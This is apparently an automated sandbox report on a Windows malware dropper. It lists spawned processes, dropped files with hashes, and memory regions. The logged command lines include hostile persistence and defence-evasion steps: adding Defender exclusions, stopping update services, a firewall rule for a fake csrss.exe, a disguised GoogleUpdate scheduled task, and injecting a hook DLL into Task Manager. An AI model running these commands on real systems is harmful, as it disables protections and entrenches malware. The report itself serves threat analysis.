"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9228 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\FDD0.exe

C:\Users\Admin\AppData\Local\Temp\FDD0.exe

C:\Users\Admin\AppData\Local\Temp\3.exe

C:\Users\Admin\AppData\Local\Temp\3.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9896 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x304 0x3e4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9836 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\113A.exe

C:\Users\Admin\AppData\Local\Temp\113A.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\163D.exe

C:\Users\Admin\AppData\Local\Temp\163D.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\1A93.exe

C:\Users\Admin\AppData\Local\Temp\1A93.exe

C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp" /SL5="$30256,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\2003.exe

C:\Users\Admin\AppData\Local\Temp\2003.exe

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 8936 -ip 8936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8936 -s 572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10260 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Roaming\htsahur

C:\Users\Admin\AppData\Roaming\htsahur

Network

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

MD5 d703218b664522433f4d04123036bc67
SHA1 05b55b0a5d5fb19fdda795adba44372384e80e22
SHA256 70e75a912cfb67015a5569fac1f8cc7abec2471700e82e73b5e8c95ae25cea63
SHA512 98ee45a6a49aa3fb0848ee5c863f5ad1b273164055db82fcf9d88bfae988e98aaea8e26345a362c925600ecbfd9e657cc6e5767783da78f8a5131073415fff69

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

MD5 4a062352e017fe64b6f7eaa03a0d0456
SHA1 8d5bb6ab5f8c9fb71d4dede267864eca7f298d6f
SHA256 da31a3caa75d8ff34741eb296daee54ffaf938e4efde7d2f4b720a01c9c9268d
SHA512 08838ef09ede829b949d18ad8c975c5f9c1dfcdc7cd6b5fd6119ca4487bfccd9593f12ca692e8f7e038ac9906faa6c0cff60ad74c21a0227855dfaaf80429bbd

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

MD5 0bcbb2a8459c76904d8f1b4001c6994b
SHA1 341968ddc448b68c47c0a5b7064d84f5ecc4ed0f
SHA256 1a19a4b6cfbd1a34eb34ff3f67518bcccc6392da2642caf50996d5dcc5953d85
SHA512 a5a4d6aeffe8be185e20fc0e9eca335112642701fe12302776d00ded4cd75f78f61fb2fb973dd8f3f92bdedb5b20bcf94c2d2a3b38d4cfef98fabff364f4794d

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

MD5 b4b91b78bfd02f0c100c2da6b53480d4
SHA1 e1263532cb98ae705a8b2ec5f11419038e8a10b1
SHA256 691e14c69fcd164d1ee43521d45274f24ce0022cab3250eae6b31a1d224b0292
SHA512 09f889de05d8bf31deebaa0aeffc6762743a40b9ba946faa3777161cdc56e35341117d87bcf75d97ab1109a5be1e9be362024676efe6a270170f23eefb1af542

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

MD5 2bfe0d06f166f617416c7efef925a083
SHA1 efc9a0a8a97d1e727ef37fb7d28f395cd658e9af
SHA256 3916a3f1b69d307cea04e96d6d7b508ae7e61dfbdde35395f928dc1707c4e04e
SHA512 a52d708f351bb251c401074f5f931c3a2e08777fc027d244180b97aad971f816c5d46aa7f86aa4b75608bee539dd64cf9c33ee0b6b390b592616e9937dfe20cc

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

MD5 d24f8149554a23ba7927cad3fe2f2130
SHA1 b59ae171270f45a8fe33d72f38028cead4ccc64e
SHA256 7cfcfc2800c81b13a46a5ca9f5e3667db14ae10e4c8087dc115d186ede8c0da1
SHA512 9689c76c35b68fb7ec5f84ec9ceb466f913ad64ae74baac1f48fd8acbbdb257b055774169aecc409a457d0f5eebaadfda078cba3c34e5f0f55afb3c9c20b0446

memory/1220-42-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

MD5 29217ddffa3effb07cca73a0f335e0d5
SHA1 de079ac8c4457c3354594b6b177c95b3082de568
SHA256 8cf009e6e26bf65c5143b55645365d9b1fb835e0aeec33f33579f2ab33cba5bc
SHA512 e6b2cc1379a7dcba9058b6c0453d8450bf0afb824c2fb1759aee62b1a5cb10149eb7123e81a2a72e21cfcd7356513b2ea4bc5566d675e2ea2839329cfdf0b821

memory/1220-46-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/3820-47-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

MD5 d2d5c305540b19582d0fa7bce1991547
SHA1 537c1268393479ab57fc36d3437cf2add7f41639
SHA256 a085fa88baf6194f4e7e64f0cdfc28f1819157a4ab68114fe7be861811dd523f
SHA512 165beb24a516852b10d3bf86495ba7da847e2e0575eb56255da33a78b6f646e2c8afcfd3570c6abec8a377e137721fc1067117d2e6f89fdbc6f61e51f68dfb5c

memory/3820-53-0x0000000000400000-0x0000000000434000-memory.dmp

memory/884-52-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3820-55-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3820-50-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3136-56-0x0000000000BA0000-0x0000000000BB6000-memory.dmp

memory/884-57-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

MD5 220ba5e7fa29452baff88741613e2432
SHA1 d38dc5eb09b403dc42228ed604d1dfd5c678a743
SHA256 b8bdfa1a37acde333a8c34ed8a95b214592d11a393f111808ac16893e6820107
SHA512 966dabbca29aebb3866087e21075a866ae7596025f6b87dbd88636e3bf817be431d6da727b1b219055adcc2928d2b70a8e92ca3cb30cad04e8b02584260dd337

memory/1104-63-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

memory/1104-69-0x0000000074A10000-0x00000000751C0000-memory.dmp

memory/1104-70-0x00000000078B0000-0x0000000007E54000-memory.dmp

memory/1104-71-0x00000000073A0000-0x0000000007432000-memory.dmp

memory/1220-78-0x0000000074A10000-0x00000000751C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

memory/1104-81-0x0000000007590000-0x00000000075A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 d7414deed28382ac271a868d929d0ea8
SHA1 3c59660bd79612724f482b7a682ff87d54a3fb1c
SHA256 35937f30394331205ac6c7cedc174e495610d366af221c93572a4cf30445b507
SHA512 0c5fd3ba3829d56a6241390d124548deaaaaba27baad692fbf1ef766e786b0e35f947af752df8c8abe5de15742982a62034911ff67eb6943fa6cc4a3d302c354

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

MD5 116616b35c9e63fde703d5b88eb2fb3f
SHA1 36019fa237f5e97471878fa697176fdfda33b1d9
SHA256 f6de88edf376e7daec9a84b06afdd7b64f931c8053ed8413afcb236335f5bc9d
SHA512 6bc84e24ef77918ed5bf52009098666b6f862230173d6ae4383b663c40aec3caf10253f5b7b0d355254301448b69b547d85d51ad058433380dcbf34beefc3c0f

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

MD5 116616b35c9e63fde703d5b88eb2fb3f
SHA1 36019fa237f5e97471878fa697176fdfda33b1d9
SHA256 f6de88edf376e7daec9a84b06afdd7b64f931c8053ed8413afcb236335f5bc9d
SHA512 6bc84e24ef77918ed5bf52009098666b6f862230173d6ae4383b663c40aec3caf10253f5b7b0d355254301448b69b547d85d51ad058433380dcbf34beefc3c0f

memory/1104-79-0x0000000007490000-0x000000000749A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe

MD5 d5e5b3b2052dec4dc72dbedbfebfb04d
SHA1 7d78a81228b89585a0eb69e0e9784b8caaba7118
SHA256 384fa3cdeb3f9e72712e6535a8fff949afac4bd6fc9de75e438b43810125806e
SHA512 c6697d5a021e4c05e75ddd86be144b222d94eb2e530298d6be730a8be7b36c5eb5d4c4d6e605455e4cc57ee41e7aeeb28cdc33f7c5c87e3795bfcaec31896c92

memory/1104-87-0x0000000008480000-0x0000000008A98000-memory.dmp

memory/1104-88-0x00000000077A0000-0x00000000078AA000-memory.dmp

memory/1104-89-0x0000000007570000-0x0000000007582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe

MD5 d5e5b3b2052dec4dc72dbedbfebfb04d
SHA1 7d78a81228b89585a0eb69e0e9784b8caaba7118
SHA256 384fa3cdeb3f9e72712e6535a8fff949afac4bd6fc9de75e438b43810125806e
SHA512 c6697d5a021e4c05e75ddd86be144b222d94eb2e530298d6be730a8be7b36c5eb5d4c4d6e605455e4cc57ee41e7aeeb28cdc33f7c5c87e3795bfcaec31896c92

memory/1104-92-0x00000000076D0000-0x000000000770C000-memory.dmp

memory/1104-94-0x0000000007710000-0x000000000775C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\88C7.tmp\88C8.tmp\88C9.bat

MD5 0769624c4307afb42ff4d8602d7815ec
SHA1 786853c829f4967a61858c2cdf4891b669ac4df9
SHA256 7da27df04c56cf1aa11d427d9a3dff48b0d0df8c11f7090eb849abee6bfe421f
SHA512 df8e4c6e50c74f5daf89b3585a98980ac1dbacf4cce641571f8999e4263078e5d14863dae9cf64be4c987671a21ebdce3bf8e210715f68c5e383cc4d55f53106

memory/1220-97-0x0000000074A10000-0x00000000751C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a7f568a3d32bd441e85bc1511092fbe0
SHA1 89fbee8e2eb6d74cc3ad66ae3ba6c7f25dce33d2
SHA256 0d60fa886bcba8089cbdc944265c78bddf1a77f28820f5314eba6c83f44c913a
SHA512 8fc5e847481d2bfbb6c0d70a1f152c43fe152d4c4aa8ec61988136945da0af944e4643adafad64a754b9b7f4d117e368916140e8275fc7568e150a98fe570779

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a7f568a3d32bd441e85bc1511092fbe0
SHA1 89fbee8e2eb6d74cc3ad66ae3ba6c7f25dce33d2
SHA256 0d60fa886bcba8089cbdc944265c78bddf1a77f28820f5314eba6c83f44c913a
SHA512 8fc5e847481d2bfbb6c0d70a1f152c43fe152d4c4aa8ec61988136945da0af944e4643adafad64a754b9b7f4d117e368916140e8275fc7568e150a98fe570779

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aed593b08b94f34dd8f68fd369652ac2
SHA1 3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95
SHA256 5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7
SHA512 16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

\??\pipe\LOCAL\crashpad_2748_SQXQYGZEFBXSIYVP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_4300_CVXYVXIAFZOMODSZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
